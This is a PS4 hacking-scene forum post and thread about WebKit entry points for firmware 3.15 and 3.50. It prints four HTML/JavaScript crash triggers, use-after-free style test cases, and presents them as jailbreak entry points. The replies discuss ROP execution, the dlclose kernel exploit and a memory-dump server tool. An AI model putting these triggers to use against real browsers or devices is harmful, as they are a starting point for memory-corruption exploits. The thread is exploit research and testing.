PS4 3.15 Firmware Entry Point for Testing from Zecoxao

Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.

• http://2.83.228.148/totally_not_gachimuchi/

@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers
1. Entry point:

<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>

2. Entry point:

<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>

Also the the source code from the Webkit from Sony

• EDIT / Update by B7U3 C50SS & source files from zecoxao & and a file server for accessing the PS4 Tests page - via, pasha4ur:
• You may also crash test your PS4 browser ATM on any FW from zecoxao's Github Page.

3. Entry Point:

<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>

4. Entry Point:

<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>

 

[Chaos Kid]

how?

You need to reverse the process but you shod also see what's bin done to those files? You may want to look there as they are manipulated

Any1 who understands manipulation there is a limit and knowing what it will do on output.

 

[mcmrc1]

have you ever released somethin @Chaos Kid ?

just asking

 

[Chaos Kid]

have you ever released somethin @Chaos Kid ?

just asking

Yes but not here and not under my name. There are a few ppl who know what I do here just not how I do it.

 

[proskopina]

intentions are what makes it about backups tbh with you. sure a person may start off with good intentions but how easy is it to fall into the wrong path.
So far ive seen all the intentions of backups which to most is about fame nothing more. theres a define line whats right and whats wrong.
ive watched the scene go thro ups and downs enough to know what my direct course of action is

i dont think by the way somebody who learns how a system is working and decide to publice things or even a way to play backup games is going in to the wrong path.
we are free to share or not.
as for the fame is in human nature,others do it for fame and others not.
and for the last...everybody is watching the scene.
but we are not here to see what is your direct course or mine.
we are here to share our findings.

 

[Fimo]

Someone on twitter showed a POC of ROP execution on a 3.50 OFW a few days ago via the webkit (Twit deleted yesterday).
I thought the limit was the dlclose kernel exploit working untill 2.57 but I was wrong ! It works only untill 2.03
The good news is that Fire30's work + dlclose may end to a "2.03 jailbreak" (end of "1.76 jailbreak").

But if the ROP exec is working on every OFW, what we ALL ready need is a kernel exploit on higher OFW > 2.04

 

[yourfakers]

Someone on twitter showed a POC of ROP execution on a 3.50 OFW a few days ago via the webkit (Twit deleted yesterday).
I thought the limit was the dlclose kernel exploit working untill 2.57 but I was wrong ! It works only untill 2.03
The good news is that Fire30's work + dlclose may end to a "2.03 jailbreak" (end of "1.76 jailbreak").

But if the ROP exec is working on every OFW, what we ALL ready need is a kernel exploit on higher OFW > 2.04

AFAIK there are people working on latest OFW. In the last ones there is a way to break in not from the browser directly but from different paths. I keep reading all day about scene and I don't remind where I read the article (I'd say it was from wololo's). As I posted before (my opinion) there are a lot of POC's emerging from forums (and even the exploit/thing that was posted here in page 11) but these are not final releases. I believe that there are sceners working to get something functional before posting. And I really think that the ps4link tools are helping to understand how ps4 works, giving the devs more options to break the ps4. Just my thoughts, I may be wrong, but this is like a balloon that is going to "pop". As fail0verflow stated: the ps4's security is not that great. They may be not releasing anything, but gives hopes to the scene community to see things like we did in the psp scene era.

 

[toni1988]

Someone on twitter showed a POC of ROP execution on a 3.50 OFW a few days ago via the webkit (Twit deleted yesterday).
I thought the limit was the dlclose kernel exploit working untill 2.57 but I was wrong ! It works only untill 2.03
The good news is that Fire30's work + dlclose may end to a "2.03 jailbreak" (end of "1.76 jailbreak").

But if the ROP exec is working on every OFW, what we ALL ready need is a kernel exploit on higher OFW > 2.04

I saw him, and i have a image of this, I also use a program called ps4 dump and a file called websploit, confirmed to have 2 entry points, he said some ps4 applications using an older version of webkit, it may be the entry point?? sorry for my bad English

edit: info of ps4dump

Webserver that listens for a connection, outputs dumps or incoming messages

PS4Dump
Piece of software that listens for commands coming from the ps4.

How to use this
Simply start the server. The server will listen for connections and display the information it receives. To be able to use this you have to combine it with WebsploitPS4.

How to create/receive dumps
Once the server is stated, it will automatically listen for dumps. The dump file is stored inside the same directory where the binary is started from. The name of the dump is always the base address where you started to dump from.

If the file already exists then PS4Dump will append the received data to the dump file, else it will create a new one.

So be carefull to not overwrite your dumps, when you start different dumps from the same base address.

@Chaos Kid @B7U3 C50SS

 

[B7U3 C50SS]

@toni1988 Since you've come forward with this info mind, telling us up to which version system software it stil works, if there are any limitations at all? Also, since you've come forward with this. does that mean you'll be making a release soon?

EDIT: i mean on that Webserver that listens for a connection, outputs dumps or incoming messages

PS4Dump

2nd EDIT: that sounds an awful lot like cfwprphts work. strange. really it sounds eerily like his work. unless someone else posted it on a private github repo and i cannot find it for that reason.

 

[toni1988]

@toni1988 Since you've come forward with this info mind, telling us up to which version system software it stil works, if there are any limitations at all? Also, since you've come forward with this. does that mean you'll be making a release soon?

EDIT: i mean on that Webserver that listens for a connection, outputs dumps or incoming messages

PS4Dump

2nd EDIT: that sounds an awful lot like cfwprphts work. strange. really it sounds eerily like his work. unless someone else posted it on a private github repo and i cannot find it for that reason.

sorry i use google translator (crap) and change some words, this info no is me, is on an user on twitter

 

[Chaos Kid]

@toni1988 Since you've come forward with this info mind, telling us up to which version system software it stil works, if there are any limitations at all? Also, since you've come forward with this. does that mean you'll be making a release soon?

EDIT: i mean on that Webserver that listens for a connection, outputs dumps or incoming messages

PS4Dump

2nd EDIT: that sounds an awful lot like cfwprphts work. strange. really it sounds eerily like his work. unless someone else posted it on a private github repo and i cannot find it for that reason.

Read thro the src I sent you I believe that's what they are using it does allow alot of things I've bin going thro it all